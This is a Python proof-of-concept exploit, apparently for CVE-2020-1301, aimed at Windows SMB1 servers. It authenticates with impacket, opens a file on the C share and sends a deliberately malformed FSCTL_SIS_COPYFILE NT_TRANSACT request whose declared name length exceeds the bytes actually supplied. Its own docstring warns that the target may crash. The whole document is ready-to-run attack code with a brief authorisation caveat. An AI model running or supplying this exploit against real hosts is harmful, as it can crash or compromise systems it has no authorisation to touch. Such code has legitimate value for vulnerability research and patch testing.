#!/usr/bin/python
import getopt
import struct
import sys

from scapy.all import *
from impacket import smb
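def main(argv):
    """Send one malformed FSCTL_SIS_COPYFILE NT_TRANSACT to an SMB1 server (CVE-2020-1301 PoC).

    Flow: authenticate with the supplied credentials (empty user and password
    by default), tree-connect to the ``C`` share, open ``Windows\\system.ini``
    read-only to obtain a FID, then send a single NT_TRANSACT IOCTL whose
    SIS_COPYFILE input buffer declares a SourceFileNameLength of 10 while only
    9 bytes of name are supplied, followed by recognisable filler
    (``A``/``B``/``C``/``D`` runs) and a marker string. The reply is never read.

    Args:
        argv: command-line arguments without the program name:
            ``-t/--target HOST`` (default 127.0.0.1), ``-u/--username USER``,
            ``-p/--password PASS``, ``-h`` for usage.

    Raises:
        SystemExit: on an unknown option (status 2) or ``-h`` (status 0).
        Errors raised by impacket while connecting, authenticating or opening
        the file propagate; only ``smb.SessionError`` from the final send is
        caught and printed.

    Safety notes: this is an *authenticated* request against a live host and
    the payload is deliberately malformed -- the target may crash or become
    unstable. Run it only against systems you are explicitly authorized to
    test. The password is taken from the command line, so it is visible in
    the process list and shell history.
    """
    usage = './CVE-2020-1301.py -t <target> -u <username> -p <password>'
    try:
        opts, _args = getopt.getopt(argv, "ht:u:p:", ["target=", "username=", "password="])
    except getopt.GetoptError:
        print(usage)  # the old message here omitted -u/-p and was misleading
        sys.exit(2)

    target_ip = "127.0.0.1"
    username = ""  # empty user + password: whatever the server makes of a null session
    password = ""
    for opt, arg in opts:
        if opt == '-h':
            print(usage)
            sys.exit()
        elif opt in ("-t", "--target"):
            target_ip = arg
        elif opt in ("-u", "--username"):
            # getopt reports the long option exactly as declared ("username="),
            # so the original test for "--user" never matched and --username
            # was silently ignored.
            username = arg
        elif opt in ("-p", "--password"):
            password = arg

    # FSCTL_SIS_COPYFILE, carried as the NT_TRANSACT_IOCTL FunctionCode.
    IOCTL_SIS_COPYFILE = 0x90100

    s = smb.SMB('*SMBSERVER', target_ip)
    s.login(username, password, '')
    tid = s.tree_connect_andx(r"\\*SMBSERVER\C")
    print("tid = %d" % tid)
    # Any existing readable file serves as the IOCTL target; system.ini is
    # present on every Windows install.
    fid = s.open_andx(tid, 'Windows\\system.ini', smb.SMB_O_OPEN, smb.SMB_ACCESS_READ)[0]
    print("fid = %d" % fid)

    try:
        pkt = smb.NewSMBPacket()
        cmd = smb.SMBCommand(smb.SMB.SMB_COM_NT_TRANSACT)
        cmd['Parameters'] = smb.SMBNTTransaction_Parameters()
        cmd['Data'] = smb.SMBNTTransaction_Data()

        # Setup words: FunctionCode (4), FID (2), then two bytes kept as 'aa'
        # from the original (presumably the IsFsctl/IsFlags octets of
        # NT_TRANSACT_IOCTL -- not verified here).
        # b'' literals are plain str on Python 2 and bytes on Python 3, so the
        # payload is byte-identical to the original on both interpreters.
        setup = struct.pack('<L', IOCTL_SIS_COPYFILE)
        setup += struct.pack('<H', fid)
        setup += b'a' * 2

        name = b''
        param = b''

        # SI_COPYFILE input buffer. The declared SourceFileNameLength (10) is
        # one byte more than the name bytes actually supplied (9); that
        # mismatch is the whole point of the request.
        src_len = 10
        data = struct.pack('<L', src_len)        # SourceFileNameLength
        data += struct.pack('<L', 1)             # DestinationFileNameLength
        data += struct.pack('<L', 0x00000002)    # Flags
        data += b'\x00' * (src_len - 1)          # SourceFileName (short by one)
        data += b'\x00'                          # DestinationFileName
        data += b'\x00\x00'
        data += b'\x41' * 16                     # filler runs: AAAA..., BBBB..., ...
        data += b'\x42' * 16
        data += b'\x43' * 16
        data += b'\x44' * 16
        data += b'Exploit me! ;-)'

        cmd['Parameters']['MaxSetupCount'] = 0x55
        cmd['Parameters']['TotalParameterCount'] = len(param)
        cmd['Parameters']['TotalDataCount'] = len(data)
        cmd['Parameters']['MaxParameterCount'] = 0x55
        cmd['Parameters']['MaxDataCount'] = 0x55
        cmd['Parameters']['ParameterCount'] = len(param)
        # Offsets count from the start of the 32-byte (0x20) SMB header; the
        # remaining constants are carried over from the original unchanged.
        cmd['Parameters']['ParameterOffset'] = 0x20 + 0x03 + 0x1c + len(setup) + len(name)
        cmd['Parameters']['DataCount'] = len(data)
        cmd['Parameters']['DataOffset'] = 0x20 + 0x03 + 0x26 + len(setup) + len(name) + len(param)
        cmd['Parameters']['Function'] = 0x0002   # NT_TRANSACT_IOCTL
        cmd['Parameters']['Setup'] = setup

        cmd['Data']['Pad1'] = b''
        cmd['Data']['NT_Trans_Parameters'] = param
        cmd['Data']['Pad2'] = b''
        cmd['Data']['NT_Trans_Data'] = data

        pkt.addCommand(cmd)
        pkt['Tid'] = tid
        # Fire and forget: the reply is not read, so a crashed target shows up
        # as a dropped connection rather than as an error here.
        smb.SMB.sendSMB(s, pkt)
    except smb.SessionError as e:
        print(e)
    finally:
        # Best-effort teardown of handle, tree and session so the socket is not
        # simply abandoned. If the target has already gone down these fail,
        # and that failure is not the interesting one, so it is swallowed.
        for teardown in (lambda: s.close(tid, fid), lambda: s.disconnect_tree(tid), s.logoff):
            try:
                teardown()
            except Exception:
                pass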
if __name__ == "__main__":
    # Hand main() everything after the program name; it parses the options itself.
    main(sys.argv[1:])